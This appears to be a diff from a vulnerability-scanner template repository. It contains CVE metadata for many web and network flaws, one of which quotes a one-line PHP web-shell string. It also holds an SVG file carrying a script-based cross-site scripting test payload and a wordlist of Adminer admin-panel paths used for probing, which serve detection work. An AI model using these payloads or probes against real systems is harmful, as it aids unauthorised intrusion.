{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the listingfields parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
@ -2583,9 +2588,11 @@
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
{"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
{"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
{"ID":"CVE-2024-45507","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45507.yaml"}
{"ID":"CVE-2024-45622","Info":{"Name":"ASIS - SQL Injection Authentication Bypass","Severity":"critical","Description":"ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45622.yaml"}
{"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"}
{"ID":"CVE-2024-46627","Info":{"Name":"DATAGERRY - REST API Auth Bypass","Severity":"critical","Description":"Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-46627.yaml"}
{"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"}
{"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"}
{"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"}
@ -2599,6 +2606,7 @@
{"ID":"CVE-2024-5315","Info":{"Name":"Dolibarr ERP CMS `list.php` - SQL Injection","Severity":"critical","Description":"Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-5315.yaml"}
{"ID":"CVE-2024-5420","Info":{"Name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting","Severity":"high","Description":"A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-5420.yaml"}
{"ID":"CVE-2024-5421","Info":{"Name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - File Exposure","Severity":"high","Description":"A vulnerability was identified in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, impacting the file handling functions. This flaw results in authenticated file disclosure, granting unauthorized access to sensitive files and directories. Although authentication is required, the vulnerability poses a significant risk of data exposure. This vulnerability is publicly disclosed and identified as CVE-2024-5421.\n","Classification":{"CVSSScore":"8.7"}},"file_path":"http/cves/2024/CVE-2024-5421.yaml"}
{"ID":"CVE-2024-5488","Info":{"Name":"SEOPress \u003c 7.9 - Authentication Bypass","Severity":"critical","Description":"The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5488.yaml"}
{"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"}
{"ID":"CVE-2024-5765","Info":{"Name":"WpStickyBar \u003c= 2.1.0 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5765.yaml"}
{"ID":"CVE-2024-5827","Info":{"Name":"Vanna - SQL injection","Severity":"critical","Description":"Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `\u003c?php system($_GET[0]); ?\u003e`. This can lead to command execution or the creation of backdoors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5827.yaml"}
@ -2614,6 +2622,7 @@
{"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"}
{"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"}
{"ID":"CVE-2024-6396","Info":{"Name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","Severity":"critical","Description":"A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6396.yaml"}
{"ID":"CVE-2024-6517","Info":{"Name":"Contact Form 7 Math Captcha \u003c= 2.0.1 - Cross-site Scripting","Severity":"medium","Description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-6517.yaml"}
{"ID":"CVE-2024-6586","Info":{"Name":"Lightdash v0.1024.6 - Server-Side Request Forgery","Severity":"high","Description":"Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting users session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-6586.yaml"}
{"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"}
{"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"}
@ -2637,7 +2646,9 @@
{"ID":"CVE-2024-7332","Info":{"Name":"TOTOLINK CP450 v4.1.0cu.747_B20191224 - Hard-Coded Password Vulnerability","Severity":"critical","Description":"A critical vulnerability has been discovered in TOTOLINK CP450 version 4.1.0cu.747_B20191224. This vulnerability affects an unknown part of the file /web_cste/cgi-bin/product.ini of the Telnet Service component. The issue stems from the use of a hard-coded password, which can be exploited remotely without any user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7332.yaml"}
{"ID":"CVE-2024-7339","Info":{"Name":"TVT DVR Sensitive Device - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T and classified as problematic. This vulnerability affects unknown code of the file /queryDevInfo. The manipulation leads to information disclosure.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-7339.yaml"}
{"ID":"CVE-2024-7340","Info":{"Name":"W\u0026B Weave Server - Remote Arbitrary File Leak","Severity":"high","Description":"The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-7340.yaml"}
{"ID":"CVE-2024-7354","Info":{"Name":"Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting","Severity":"medium","Description":"The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-7354.yaml"}
{"ID":"CVE-2024-7593","Info":{"Name":"Ivanti vTM - Authentication Bypass","Severity":"critical","Description":"Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7593.yaml"}
{"ID":"CVE-2024-7714","Info":{"Name":"AI Assistant with ChatGPT by AYS \u003c= 2.0.9 - Unauthenticated AJAX Calls","Severity":"medium","Description":"The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-7714.yaml"}
{"ID":"CVE-2024-7786","Info":{"Name":"Sensei LMS \u003c 4.24.2 - Email Template Leak","Severity":"high","Description":"The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-7786.yaml"}
{"ID":"CVE-2024-7928","Info":{"Name":"FastAdmin \u003c V1.3.4.20220530 - Path Traversal","Severity":"medium","Description":"A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-7928.yaml"}
{"ID":"CVE-2024-7954","Info":{"Name":"SPIP Porte Plume Plugin - Remote Code Execution","Severity":"critical","Description":"The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7954.yaml"}
@ -2647,6 +2658,7 @@
{"ID":"CVE-2024-8517","Info":{"Name":"SPIP BigUp Plugin - Remote Code Execution","Severity":"critical","Description":"SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8517.yaml"}
{"ID":"CVE-2024-8522","Info":{"Name":"LearnPress WordPress LMS - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8522.yaml"}
{"ID":"CVE-2024-8752","Info":{"Name":"WebIQ 2.15.9 - Directory Traversal","Severity":"high","Description":"The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8752.yaml"}
{"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"}
{"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"}
{"ID":"CVE-2024-9014","Info":{"Name":"pgAdmin 4 - Authentication Bypass","Severity":"critical","Description":"pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9014.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
@ -2666,3 +2678,13 @@
{"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"}
{"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"}
{"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"}
{"ID":"CVE-2012-2122","Info":{"Name":"MySQL - Authentication Bypass","Severity":"medium","Description":"sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.\n","Classification":{"CVSSScore":"5.1"}},"file_path":"javascript/cves/2012/CVE-2012-2122.yaml"}
{"ID":"CVE-2016-8706","Info":{"Name":"Memcached Server SASL Authentication - Remote Code Execution","Severity":"high","Description":"An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"javascript/cves/2016/CVE-2016-8706.yaml"}
{"ID":"CVE-2019-9193","Info":{"Name":"PostgreSQL 9.3-12.3 Authenticated Remote Code Execution","Severity":"high","Description":"In PostgreSQL 9.3 through 11.2, the \"COPY TO/FROM PROGRAM\" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for COPY TO/FROM PROGRAM is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the COPY FROM PROGRAM.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"javascript/cves/2019/CVE-2019-9193.yaml"}
{"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"javascript/cves/2020/CVE-2020-7247.yaml"}
{"ID":"CVE-2023-34039","Info":{"Name":"VMWare Aria Operations - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)\nVersion: All versions from 6.0 to 6.10\n","Classification":{"CVSSScore":"9.8"}},"file_path":"javascript/cves/2023/CVE-2023-34039.yaml"}
{"ID":"CVE-2023-46604","Info":{"Name":"Apache ActiveMQ - Remote Code Execution","Severity":"critical","Description":"Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.\nUsers are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"javascript/cves/2023/CVE-2023-46604.yaml"}
{"ID":"CVE-2023-48795","Info":{"Name":"OpenSSH Terrapin Attack - Detection","Severity":"medium","Description":"The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"javascript/cves/2023/CVE-2023-48795.yaml"}
{"ID":"CVE-2024-23897","Info":{"Name":"Jenkins \u003c 2.441 - Arbitrary File Read","Severity":"high","Description":"Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"javascript/cves/2024/CVE-2024-23897.yaml"}
{"ID":"CVE-2024-45519","Info":{"Name":"Zimbra Collaboration Suite \u003c 9.0.0 - Remote Code Execution","Severity":"critical","Description":"SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"javascript/cves/2024/CVE-2024-45519.yaml"}
{"ID":"CVE-2024-47176","Info":{"Name":"CUPS - Remote Code Execution","Severity":"high","Description":"CUPS is a standards-based, open-source printing system, and cups-browsed contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. cups-browsed binds to INADDR_ANY-631, causing it to trust any packet from any source, and can cause the Get-Printer-Attributes IPP request to an attacker controlled URL.\nDue to the service binding to *-631 ( INADDR_ANY ), multiple bugs in cups-browsed can be exploited in sequence to introduce a malicious printer to the system. This chain of exploits ultimately enables an attacker to execute arbitrary commands remotely on the target machine without authentication when a print job is started. This poses a significant security risk over the network. Notably, this vulnerability is particularly concerning as it can be exploited from the public internet, potentially exposing a vast number of systems to remote attacks if their CUPS services are enabled.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"javascript/cves/2024/CVE-2024-47176.yaml"}

View File

@ -1 +1 @@
9fe25cb652f551d9827acd96ea3fe5f5
34d767d0d4ce4e7d79ac3e12ad34b41b

View File

@ -0,0 +1,8 @@
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('document.domain');
</script>
</svg>

After

Width:  |  Height:  |  Size: 381 B

View File

@ -735,8 +735,43 @@
/php/adminer.php
/phpmyadmin.php
/public/adminer.php
/public/adminer/
/sql.php
/tools/adminer.php
/web/adminer.php
/wp-content/plugins/adminer/adminer.php
/modules/sfkdbmanage/adminer.php
/modules/sfkdbmanage/adminer.php
/editor-4.8.1-pl.php
/editor-4.8.1-sk.php
/editor-4.8.1.php
/editor-4.8.1-cs.php
/editor-4.8.1-de.php
/editor-4.8.1-en.php
/editor-4.8.1-mysql-cs.php
/editor-4.8.1-mysql-de.php
/editor-4.8.1-mysql-en.php
/editor-4.8.1-mysql-pl.php
/editor-4.8.1-mysql-sk.php
/editor-4.8.1-mysql.php
/adminer-4.8.1-cs.php
/adminer-4.8.1-de.php
/adminer-4.8.1-en.php
/adminer-4.8.1-mysql-cs.php
/adminer-4.8.1-mysql-de.php
/adminer-4.8.1-mysql-en.php
/adminer-4.8.1-mysql-pl.php
/adminer-4.8.1-mysql-sk.php
/adminer-4.8.1-mysql.php
/adminer-4.8.1-pl.php
/adminer-4.8.1-sk.php
/adminer-4.8.1.php
/adminer-4.8.1/
/itlabvietadminer.php
/vendor/phpunit/phpunit/src/Util/PHP/adminer-4.7.7.php
/vendor/phpunit/phpunit/src/Util/PHP/adminer.php
/adminer462.php
/db/adminer.php
/wp-content/themes/twentysixteen/adminer.php
/adminer2.php
/adminer-4.php
/adminer_new.php

View File

@ -1 +1 @@
2.7.36
2.7.38

View File

@ -1 +1 @@
4.1.4
4.1.5

View File

@ -1 +1 @@
3.1.2
3.2

View File

@ -1 +1 @@
3.24.4
3.24.5

View File

@ -0,0 +1 @@
1.15.0

View File

@ -1 +1 @@
5.2.3
5.2.4

View File

@ -1 +1 @@
6.14.1
6.15

View File

@ -1 +1 @@
2.8.5
2.8.6

View File

@ -1 +1 @@
3.0.11
3.0.12

View File

@ -1 +1 @@
1.5.3
1.5.4

View File

@ -1 +1 @@
13.8.1
13.9

View File

@ -1 +1 @@
3.2.54
3.3.1

View File

@ -1 +1 @@
1.9.1
1.9.2

View File

@ -1 +1 @@
5.2.2
5.3.0

View File

@ -1 +1 @@
2.9.8
2.9.9

View File

@ -1 +1 @@
4.10.54
4.10.55

View File

@ -1 +1 @@
3.6.8
3.6.10

View File

@ -1 +1 @@
1.3.986
1.3.987

View File

@ -1 +1 @@
1.0.228
1.0.229

View File

@ -1 +1 @@
6.1.0
6.1.1

View File

@ -1 +1 @@
8.2.2
8.3.0

View File

@ -1 +1 @@
2.9.1
2.9.2

View File

@ -0,0 +1 @@
1.12.0

View File

@ -1 +1 @@
14.10.1
14.10.2

View File

@ -1 +1 @@
1.9.1.2
1.9.1.3

View File

@ -0,0 +1,43 @@
